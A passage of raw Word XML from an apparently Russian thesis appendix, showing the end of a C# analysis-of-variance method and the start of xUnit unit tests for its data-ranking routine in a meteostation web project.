      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> == 0 || </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>resAx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> == 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4662F6A6" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9D1931" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Fcrit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Ftable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>neededFtableKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDC534D" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>FdistributionCalculator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>fdc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>FdistributionCalculator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15749D66" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            p = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>fdc.fcdistribution</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>resAx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>resy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>, F);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C6FF3D" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>SSa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Math.Round</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>SSa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>, 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3A8EF1" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>SSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Math.Round</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>SSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>, 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178A8DD8" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>MSa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Math.Round</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>MSa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>, 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3970463A" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>MSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Math.Round</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>MSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>, 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2342DFBC" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            F = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Math.Round</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(F, 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578DFFC5" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            p = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Math.Round</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(p, 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9A058D" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D3DC06" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5B71FC" w14:textId="2A2B895C" w:rsidR="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634161F7" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRDefault="00CC2EBA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E174BE0" w14:textId="665DA377" w:rsidR="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc162709251"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ Д (Модульные тесты для проверки работоспособности алгоритма дисперсионного анализа</w:t>
      </w:r>
      <w:r w:rsidRPr="00B549DB">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="1F1A33B4"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FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>using</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Xunit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3E4806"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FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>using</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ServerMVC.Controllers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5DDA8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FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>using</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ServerMVC.Models</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9570C4"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FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>using</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ServerMVC.Infrastructure.Statistics</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0613F57C"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46BD473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FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>namespace</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ServerMVC.Test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66614F5C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2E627A"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public</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class</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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>MeteostationTest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1484A4EF" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="001F04F3"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sidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB82AA8" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="001F04F3"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sidRPr="001F04F3">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>///</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>summary</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174953F6"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sidRPr="001F04F3">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>///</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">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008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Тестирование</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">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008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>метода</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">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008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ранжирования</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">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008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>данных</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">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008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Тест без повторяющихся значений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7326D18A"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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>summary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33419EC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Pr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>[Fact]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77753E09"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public</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void</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RangeDataWithoutRepeat</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D9E83D"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
    <w:p w14:paraId="2DAF4780"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3, 8, 4, 5 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3856BD16"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b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1, 6, 7, 0 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A0C8A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c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9, 2 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3FDDA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 xml:space="preserve">] dat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 a, b, c };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36274814"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C04FD2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 xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>analysisController.RangeData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066FE157"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0D246DD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A</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4, 9, 5, 6 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4997BE61"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B</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2, 7, 8, 1 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6F7C2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C</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10, 3 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FBF4F6"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Data</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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>actual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B</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C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F14BB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07F1CCB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for</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int</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 = 0;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 &lt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>rangedData.Length</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6246AB1E"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
    <w:p w14:paraId="4C1F91AA"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for</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> j = 0; j &lt;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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>].Length</w:t>
      </w:r>
      <w:proofErr w:type="gram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j++</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
